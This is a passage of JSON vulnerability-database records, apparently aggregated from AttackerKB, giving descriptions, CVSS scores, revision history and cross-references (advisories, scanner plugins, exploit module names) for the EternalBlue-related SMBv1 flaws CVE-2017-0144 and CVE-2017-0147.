["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0148"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-07-20T20:10:58", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2021-07-20T20:10:58", "rev": 2}}, "objectVersion": "1.5", "attackerkb": {"attackerValue": 5, "exploitability": 4}, "wildExploited": true, "wildExploitedCategory": {}, "wildExploitedReports": [], "references_categories": {"Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://www.securityfocus.com/bid/96704"], "Advisory": ["https://www.exploit-db.com/exploits/42031", "https://www.exploit-db.com/exploits/42030", "https://www.exploit-db.com/exploits/41891", "http://www.securitytracker.com/id/1037991", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf", "https://www.exploit-db.com/exploits/41987", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf"], "Miscellaneous": ["https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html"]}, "tags": ["common_enterprise", "easy_to_develop", "pre_auth"], "mitre_vector": {"Initial Access": ["Exploit Public-Facing Application(Validated)"], "Lateral Movement": ["Remote Services(Validated)"]}, "last_activity": "2021-01-27T09:26:00", "_object_type": "robots.models.attackerkb.AttackerKB", "_object_types": ["robots.models.attackerkb.AttackerKB", "robots.models.base.Bulletin"], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "caf9b6b99962bf5c2264824231d7a40c"}, {"key": "cvelist", "hash": "f3f172d109ebf206391628f4241045e7"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "6e0b7952dde138a784afb955c0264daf"}, {"key": "href", "hash": "77e144ca40ee58b38f8310032f97520a"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "33304c5ad4f24166080d70e5d2fa6357"}, {"key": "published", "hash": "0404a0b8374966187f59ed4a2b846395"}, {"key": "references", "hash": "127216f4a57b3845fca792aa41d3d054"}, {"key": "reporter", "hash": "5e5266bea17c39e5ee12abd5fcbf7c2b"}, {"key": "title", "hash": "d650c395d3b7dd2f2da9517bdf7ca6dc"}, {"key": "type", "hash": "dbbc8fce9a59d0a898c44c4f99244f4a"}], "scheme": null}, {"id": "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "hash": "7f7b33f7b3e9e93cbe9704552ddc5dfdff2fd192d2c729f117c9c1f6790c4091", "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2017-0147", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to obtain sensitive information from process memory via a crafted packets, aka \u201cWindows SMB Information Disclosure Vulnerability.\u201d\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 3:08am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n\nAgain this is all part of CVE-2017-0143 to CVE-2017-0147 which were all exploited in NSA\u2019s exploit leak.\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "published": "2017-03-17T00:00:00", "modified": "2020-07-30T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://attackerkb.com/topics/DLKDGyTA2X/cve-2017-0147", "reporter": "AttackerKB", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://www.securityfocus.com/bid/96709", "https://www.exploit-db.com/exploits/41891", "http://www.securitytracker.com/id/1037991", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf", "https://www.exploit-db.com/exploits/41987", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/43970", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html"], "cvelist": ["CVE-2017-0143", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-07-20T20:12:25", "history": [{"bulletin": {"bulletinFamily": "info", "cvelist": ["CVE-2017-0147", "CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to obtain sensitive information from process memory via a crafted packets, aka \u201cWindows SMB Information Disclosure Vulnerability.\u201d\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 3:08am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n\nAgain this is all part of CVE-2017-0143 to CVE-2017-0147 which were all exploited in NSA\u2019s exploit leak.\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2021-07-20T20:12:25", "references": [{"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["CVE-2017-0147", "CVE-2017-0143"], "type": "cve"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], "type": "ics"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["SMNTC-96709", "SMNTC-96703"], "type": "symantec"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}], "rev": 2}, "score": {"modified": "2021-07-20T20:12:25", "rev": 2, "value": 6.4, "vector": "NONE"}}, "hash": "cf4fad3835543f80b32592b67e4a64739d5ddd9cd732c8eebfd7ce9e98c36703", "hashmap": [{"hash": "0404a0b8374966187f59ed4a2b846395", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "33304c5ad4f24166080d70e5d2fa6357", "key": "modified"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "b981c43af3b615a415964e8db3de7b8e", "key": "href"}, {"hash": "9e3184b090a916875fe172879504df32", "key": "cvelist"}, {"hash": "76174974a44b129dc7cb9905e72bee93", "key": "description"}, {"hash": "5e5266bea17c39e5ee12abd5fcbf7c2b", "key": "reporter"}, {"hash": "39066d294b8fbf1c3a8cec09d69adbc3", "key": "references"}, {"hash": "dbbc8fce9a59d0a898c44c4f99244f4a", "key": "type"}, {"hash": "86a69a73afce6263b58d42af8e129794", "key": "title"}], "history": [], "href": "https://attackerkb.com/topics/DLKDGyTA2X/cve-2017-0147", "id": "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "immutableFields": [], "lastseen": "2021-07-20T20:12:25", "modified": "2020-07-30T00:00:00", "objectVersion": "1.5", "published": "2017-03-17T00:00:00", "references": ["https://www.exploit-db.com/exploits/43970", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147", "https://www.exploit-db.com/exploits/41987", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://www.securityfocus.com/bid/96709", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41891", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "AttackerKB", "title": "CVE-2017-0147", "type": "attackerkb", "viewCount": 3}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2021-07-20T20:12:25"}, {"bulletin": {"attackerkb": {}, "bulletinFamily": "info", "cvelist": ["CVE-2017-0147", "CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to obtain sensitive information from process memory via a crafted packets, aka \u201cWindows SMB Information Disclosure Vulnerability.\u201d\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 3:08am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n\nAgain this is all part of CVE-2017-0143 to CVE-2017-0147 which were all exploited in NSA\u2019s exploit leak.\n", "enchantments": {"dependencies": {"modified": "2021-04-25T06:21:28", "references": [{"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["CVE-2017-0147", "CVE-2017-0143"], "type": "cve"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], "type": "ics"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["SMNTC-96709", "SMNTC-96703"], "type": "symantec"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}], "rev": 2}, "score": {"modified": "2021-04-25T06:21:28", "rev": 2, "value": 6.4, "vector": "NONE"}}, "hash": "509fede319eb190aec4937fb25737550", "history": [], "href": "https://attackerkb.com/topics/DLKDGyTA2X/cve-2017-0147", "id": "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "immutableFields": [], "last_activity": null, "lastseen": "2021-04-25T06:21:28", "mitre_vector": {}, "modified": "2020-07-30T00:00:00", "objectVersion": "1.5", "published": "2017-03-17T00:00:00", "references": ["https://www.exploit-db.com/exploits/43970", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147", "https://www.exploit-db.com/exploits/41987", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://www.securityfocus.com/bid/96709", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41891", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "references_categories": {}, "reporter": "AttackerKB", "tags": [], "title": "CVE-2017-0147", "type": "attackerkb", "viewCount": 2, "wildExploited": true, "wildExploitedCategory": {}, "wildExploitedReports": []}, "differentElements": ["last_activity", "references_categories"], "edition": 3, "lastseen": "2021-04-25T06:21:28"}, {"bulletin": {"attackerkb": {}, "bulletinFamily": "info", "cvelist": ["CVE-2017-0147", "CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to obtain sensitive information from process memory via a crafted packets, aka \u201cWindows SMB Information Disclosure Vulnerability.\u201d\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 3:08am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n\nAgain this is all part of CVE-2017-0143 to CVE-2017-0147 which were all exploited in NSA\u2019s exploit leak.\n", "enchantments": {"dependencies": {"modified": "2020-11-22T06:09:46", "references": [{"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["CVE-2017-0147", "CVE-2017-0143"], "type": "cve"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], "type": "ics"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["SMNTC-96709", "SMNTC-96703"], "type": "symantec"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}], "rev": 2}, "score": {"modified": "2020-11-22T06:09:46", "rev": 2, "value": 6.4, "vector": "NONE"}}, "hash": "8e4f5781a293b794a4c2cc0694040a2f", "history": [], "href": "https://attackerkb.com/topics/DLKDGyTA2X/cve-2017-0147", "id": "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "immutableFields": [], "last_activity": null, "lastseen": "2020-11-22T06:09:46", "mitre_vector": {}, "modified": "2020-07-30T00:00:00", "objectVersion": "1.5", "published": "2017-03-17T00:00:00", "references": ["https://www.exploit-db.com/exploits/43970", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147", "https://www.exploit-db.com/exploits/41987", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://www.securityfocus.com/bid/96709", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41891", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "references_categories": {}, "reporter": "AttackerKB", "tags": [], "title": "CVE-2017-0147", "type": "attackerkb", "viewCount": 2, "wildExploited": true, "wildExploitedCategory": {}, "wildExploitedReports": []}, "differentElements": ["cvelist"], "edition": 1, "lastseen": "2020-11-22T06:09:46"}, {"bulletin": {"attackerkb": {}, "bulletinFamily": "info", "cvelist": ["CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0022"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows 